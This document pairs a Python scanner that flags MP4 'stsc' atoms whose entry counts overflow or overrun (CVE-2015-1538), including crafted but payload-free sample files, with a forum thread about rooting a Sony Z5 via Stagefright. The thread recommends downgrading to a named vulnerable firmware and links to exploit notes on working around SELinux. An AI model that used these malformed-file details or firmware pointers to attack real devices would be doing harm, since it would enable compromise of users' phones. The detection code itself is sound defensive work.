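The posts above are about producing and testing a crafted MP4; the counterpart a defender wants is a way to recognise such a file before a media parser touches it. The Python 3 script below is an added example, not code from the thread or from the Zimperium script: it walks the MP4/3GP atom tree read-only and flags an 'stsc' (sample-to-chunk) table whose declared entry count either cannot fit in its own atom or is so large that count * 12 wraps in 32-bit arithmetic, the length inconsistency at the heart of CVE-2015-1538 #1. It generalises slightly beyond the thread by also handling the 64-bit "largesize" and size-0 atom forms. The three sample files, and the container list, are constructed for the example; they carry no payload, only mismatched lengths.

```python
import struct

CONTAINERS = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}
STSC_ENTRY_SIZE = 12        # each SampleToChunk entry is three uint32 fields
UINT32_MAX = 0xFFFFFFFF


def iter_atoms(data, start=0, end=None):
    """Yield (fourcc, atom_start, payload_start, atom_end) for each atom in data[start:end]."""
    end = len(data) if end is None else end
    pos = start
    while pos + 8 <= end:
        size, tag = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:                          # 64-bit "largesize" form
            if pos + 16 > end:
                raise ValueError("truncated largesize header at offset %d" % pos)
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:                        # atom extends to the end of its parent
            size = end - pos
        if size < header or pos + size > end:
            raise ValueError("atom %r at offset %d declares size %d beyond its parent" % (tag, pos, size))
        yield tag, pos, pos + header, pos + size
        pos += size


def check_stsc(payload):
    """Findings for one stsc payload: 4 bytes version/flags, uint32 entry count, entries."""
    findings = []
    if len(payload) < 8:
        return ["stsc payload is shorter than its fixed 8-byte header"]
    count = struct.unpack(">I", payload[4:8])[0]
    # count * 12 wraps in 32-bit arithmetic above this bound; a parser that sizes its
    # entry buffer from the wrapped product allocates far less than it then copies.
    if count > UINT32_MAX // STSC_ENTRY_SIZE:
        findings.append("entry count 0x%08x overflows 32-bit size arithmetic" % count)
    needed = count * STSC_ENTRY_SIZE
    available = len(payload) - 8
    if needed > available:
        findings.append("declares %d entries (%d bytes) but only %d bytes follow" % (count, needed, available))
    return findings


def scan(data):
    """Walk the atom tree and return (atom_offset, message) for every suspicious stsc."""
    findings = []

    def walk(start, end):
        for tag, atom_start, payload_start, atom_end in iter_atoms(data, start, end):
            if tag in CONTAINERS:
                walk(payload_start, atom_end)
            elif tag == b"stsc":
                for message in check_stsc(data[payload_start:atom_end]):
                    findings.append((atom_start, message))

    walk(0, len(data))
    return findings


# --- constructed sample files: not real media, and no payload of any kind ---
def atom(tag, payload):
    return struct.pack(">I4s", 8 + len(payload), tag) + payload


def sample_file(stsc_payload):
    """ftyp followed by a moov/trak/mdia/minf/stbl chain whose only leaf is the given stsc."""
    ftyp = atom(b"ftyp", b"mp42" + struct.pack(">I", 0) + b"mp42isom")
    stbl = atom(b"stbl", atom(b"stsc", stsc_payload))
    return ftyp + atom(b"moov", atom(b"trak", atom(b"mdia", atom(b"minf", stbl))))


ENTRY = struct.pack(">III", 1, 1, 1)                                 # first_chunk, samples_per_chunk, desc_id
GOOD_FILE = sample_file(struct.pack(">II", 0, 1) + ENTRY)             # count matches the data
TRUNCATED_FILE = sample_file(struct.pack(">II", 0, 5) + ENTRY * 2)    # claims 5 entries, carries 2
OVERFLOW_FILE = sample_file(struct.pack(">II", 0, 0xC0000003) + ENTRY * 3)  # count wraps at 32 bits

if __name__ == "__main__":
    for name, blob in (("good", GOOD_FILE), ("truncated", TRUNCATED_FILE), ("overflow", OVERFLOW_FILE)):
        print(name, scan(blob) or "clean")
```

The atom sizes in the samples are all internally consistent; only the entry count inside the stsc payload lies, which is exactly why a parser that trusts that count instead of the enclosing atom length gets into trouble. Run over a mailbox or MMS store, the same walk gives a cheap pre-filter; it is not a substitute for the platform patch.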
Hey @klausstoertebeker I have an unrooted stock Sony Z5 Compact that can be used for exploit testing. I wanted to offer it for this purpose before rooting it. If having someone volunteer their "unrooted, bootloader never unlocked" phone as a test device is helpful then let me know.
Otherwise I'm going to root my new phone soon.
Keep up the good work!
Hello Joeisgood99!
Thanks for your offer, but I'm not a programmer who takes part in rooting the Z5 compact actively 'cause I'm not experienced with Android programming at all. But I tried to give some thought to how root on this excellent mobile phone could be achieved.
For me using this exploit has become obsolete 'cause I accidentally did a system update where all the Stagefright exploits are closed...
Regards
"Klaus"
You can downgrade your phone using the flashtools to a previous Android version. Don't give up!!!!
Sent from my E6533 using XDA Free mobile app
Maybe downgrade,...
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll lose your DRM keys.
And the intention of most "rooting" forums is to find a way of rooting the mobile phone without unlocking the bootloader, to keep the DRM keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROMs.
You don't need to unlock bootloader to flash an official firmware.
klausstoertebeker said:
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll lose your DRM keys.
And the intention of most "rooting" forums is to find a way of rooting the mobile phone without unlocking the bootloader, to keep the DRM keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROMs.
You can flash FTFs without any need of unlocking a bootloader. And while you're at it: use 32.0.A.4.11. Literally everything except CVE-2015-3876 is vulnerable. I just bought a Z5, and am looking forward to putting some effort into messing with Stagefright rooting.
I'm having a Z5 E6653 BTW
Sorry,...
... Myself5!
You're right saying that FTFs can be flashed without unlocking the bootloader. But nevertheless I won't downgrade again at the moment.
The reason for me to root my Z5 compact is that I'd like to install Xposed in combination with XPrivacy for security reasons. I want to control the access of apps to my personal data (contacts, calendar, location, etc). But now I found two apps which fulfil my security needs without root privileges:
MoboClean, which is released as a working app
SRT AppGuard, which is in beta stage
I prefer the second solution, but at the moment it is still under development. I used it with KitKat and JellyBean and it was really good. And until it is released as a "productive" app I'll use MoboClean.
And the second reason for rooting my Z5 compact was that I want to uninstall those Google apps (and other pre-installed bloatware) which collect my data and "phone home" without my notice. And this can be done without rooting now on the Z5 compact via "Preferences -> Apps", selecting "Deactivate" in the appropriate app tab.
There are a number of Stagefright vulnerabilities in some of the stock firmware releases downloadable on XperiFirm. I have made screenshots and posted them on this thread.
http://forum.xda-developers.com/showpost.php?p=64618471&postcount=93
Pardon me, but I was just thinking..
https://www.nccgroup.trust/globalas...pers/2016/01/libstagefright-exploit-notespdf/
Here there are some steps/tips on how to deal with SELinux policy in order to use stagefright exploits successfully. Expert-oriented information
@zxz0O0 sorry to disturb you, I don't know if you already know those things but I thought it's worth a check